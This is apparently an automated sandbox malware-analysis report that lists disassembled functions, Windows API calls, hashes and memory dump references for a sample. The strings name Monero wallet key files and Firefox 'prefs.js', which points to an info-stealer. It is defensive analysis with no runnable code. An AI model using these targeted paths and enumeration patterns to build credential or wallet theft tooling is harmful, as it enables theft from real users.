                            • Opcode ID: 7c9dd13f25a554a0be8629f1d10c33b1283367cd06a7f78017392317ddaea005
                            • Instruction ID: 4f77a71fa2d2aaa30dfb2ecc9003e53242b787d9dc107458767dcdbe264093e2
                            • Opcode Fuzzy Hash: 7c9dd13f25a554a0be8629f1d10c33b1283367cd06a7f78017392317ddaea005
                            • Instruction Fuzzy Hash: A25162B1900218ABCB64FB70DC89FED737DBB58300F404698F64996190EF749B848F96
                            Function 00683EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00683EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00683EDA
                            • StrCmpCA.SHLWAPI(?,00690FAC), ref: 00683F08
                            • StrCmpCA.SHLWAPI(?,00690FB0), ref: 00683F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068406C
                            • FindClose.KERNEL32(000000FF), ref: 00684081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 89908bd9d061e5ca72f09aaaf64d8af7cc923873ed30bfc5957cb5e359f56316
                            • Instruction ID: 83cb1f291076dc3aa367d1ce971ae94b721d23e91077d48d16564de53949fa19
                            • Opcode Fuzzy Hash: 89908bd9d061e5ca72f09aaaf64d8af7cc923873ed30bfc5957cb5e359f56316
                            • Instruction Fuzzy Hash: 6D5195B2900218AFCB28FBB0DC85EEA737DBB48300F40469DB65996140EB759B85CF95
                            Function 0067ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0067ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0067ED55
                            • StrCmpCA.SHLWAPI(?,00691538), ref: 0067EDAB
                            • StrCmpCA.SHLWAPI(?,0069153C), ref: 0067EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0067F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: b7e5e6ffe93a085bef3a83a8f932b4916106846756046fd0323476cb846b064e
                            • Instruction ID: 11e40726a7979a1fdda9b45d52620b34bb6c37c7906ba308b16e52cfa648eeb8
                            • Opcode Fuzzy Hash: b7e5e6ffe93a085bef3a83a8f932b4916106846756046fd0323476cb846b064e
                            • Instruction Fuzzy Hash: D0E1B7B151111856FB94FB90DC51EEE733EAF54300F4042DEB90A66492EE346F8ACF66
                            Function 0067F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006915B8,00690D96), ref: 0067F71E
                            • StrCmpCA.SHLWAPI(?,006915BC), ref: 0067F76F
                            • StrCmpCA.SHLWAPI(?,006915C0), ref: 0067F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0067FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: b50bad15d07e1e70b06abbbc572fe05a3459b43996da99fa310da21e3433817e
                            • Instruction ID: 974a6d5d16d8706268da5fd2ed29ebcbf672cbe0b9594c768eb0b9b0fdc96d2c
                            • Opcode Fuzzy Hash: b50bad15d07e1e70b06abbbc572fe05a3459b43996da99fa310da21e3433817e
                            • Instruction Fuzzy Hash: DBB155719001149BEB64FFA0DC95EED737AAF54300F5086ADE80E96141EF346B49CF96
                            Function 006716D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0069510C,?,?,?,006951B4,?,?,00000000,?,00000000), ref: 00671923
                            • StrCmpCA.SHLWAPI(?,0069525C), ref: 00671973
                            • StrCmpCA.SHLWAPI(?,00695304), ref: 00671989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00671D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00671DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00671E20
                            • FindClose.KERNEL32(000000FF), ref: 00671E32
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 4d90e04dc9201fe43eb66e185c1e300d40e93ee7392aa265ddab40879a6604b3
                            • Instruction ID: ab60c229aa07edf59b1100fd39f2fea0c1d69c13714a547afd02b6dda51e611d
                            • Opcode Fuzzy Hash: 4d90e04dc9201fe43eb66e185c1e300d40e93ee7392aa265ddab40879a6604b3
                            • Instruction Fuzzy Hash: 291245719111189BEF59FBA0CC95AED737AAF14300F4042DEB90A66091EF346F49CFA5
                            Function 0067DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00690C2E), ref: 0067DE5E
                            • StrCmpCA.SHLWAPI(?,006914C8), ref: 0067DEAE
                            • StrCmpCA.SHLWAPI(?,006914CC), ref: 0067DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0067E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 66329986afa3744ff0e9ecc61f1db56345c4991c6a669b41c6ba226e57b50a41
                            • Instruction ID: f69acb40ac03b5193eeeb8ad0910f359970deb7dda2f3a21bfc3cec552075857
                            • Opcode Fuzzy Hash: 66329986afa3744ff0e9ecc61f1db56345c4991c6a669b41c6ba226e57b50a41
                            • Instruction Fuzzy Hash: B0F1A3714151189AEB59FBA0CC95EEE737ABF14300F5042DEA81A62091EF346F4ACF66
                            Function 0067DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006914B0,00690C2A), ref: 0067DAEB
                            • StrCmpCA.SHLWAPI(?,006914B4), ref: 0067DB33
                            • StrCmpCA.SHLWAPI(?,006914B8), ref: 0067DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0067DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 4014901a23937bbff88936eb5a86db616a893034f8de21a54460f9e288adab32
                            • Instruction ID: 7d5b568c8c48f80a3b5f10412119dccb7129f180c8480b41588356b0e1287c4a
                            • Opcode Fuzzy Hash: 4014901a23937bbff88936eb5a86db616a893034f8de21a54460f9e288adab32
                            • Instruction Fuzzy Hash: D19127B69001049BDB54FBB4DC569ED737FAF84300F40875DFD0AA6141EE38AB498B96
                            Function 00687B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,006905AF), ref: 00687BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00687BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00687C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00687C62
                            • LocalFree.KERNEL32(00000000), ref: 00687D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: c68035ae792acfa0a7de22baeff4d58f7d4677cebba94698ba720399e967b03d
                            • Instruction ID: 00a978ff2d3538fb1040ff4c2b6b25bae292c07bde9506179e0ebd9fa2ea6b37
                            • Opcode Fuzzy Hash: c68035ae792acfa0a7de22baeff4d58f7d4677cebba94698ba720399e967b03d
                            • Instruction Fuzzy Hash: B2417E71901218AFDB24EB94DC99BEEB379FF44700F2042D9E40962290DB346F86CFA5
                            Function 00A40391 Relevance: 10.5, Strings: 7, Instructions: 1716COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: o$e={$vx;$wL[o$#{|$R7]$9[
                            • API String ID: 0-3673019907
                            • Opcode ID: 2112db96df16b97b2ade585b4999f6c8027f5ea9d2463703293413a8177371d6
                            • Instruction ID: bf7b472cbdde5821d874292caba70ce96fbdcac76dafdda930d23ea8a5c15fa3
                            • Opcode Fuzzy Hash: 2112db96df16b97b2ade585b4999f6c8027f5ea9d2463703293413a8177371d6
                            • Instruction Fuzzy Hash: 43B26BF390C2049FD3046E2DEC8567AFBE9EF94720F1A863DEAC4D3744E63598058696
                            Function 00A455BF Relevance: 10.3, Strings: 7, Instructions: 1586COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -lo$`H8Q$q~~;$rv~$t;a+$y}$%?f
                            • API String ID: 0-2045357309
                            • Opcode ID: 3e7f0b8175b9a07caecc3f242503b28f1d34376b235fdf6f83b4845224b396aa
                            • Instruction ID: d4606ee8e6953110eed858b6ba7e0eceef48f42a78cffc78757cd11ff951e3ff
                            • Opcode Fuzzy Hash: 3e7f0b8175b9a07caecc3f242503b28f1d34376b235fdf6f83b4845224b396aa
                            • Instruction Fuzzy Hash: C0B2E6F360C204AFE704AE2DEC8567ABBE5EF94720F16493DEAC4C3744EA3558058697
                            Function 00A42033 Relevance: 10.3, Strings: 7, Instructions: 1580COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
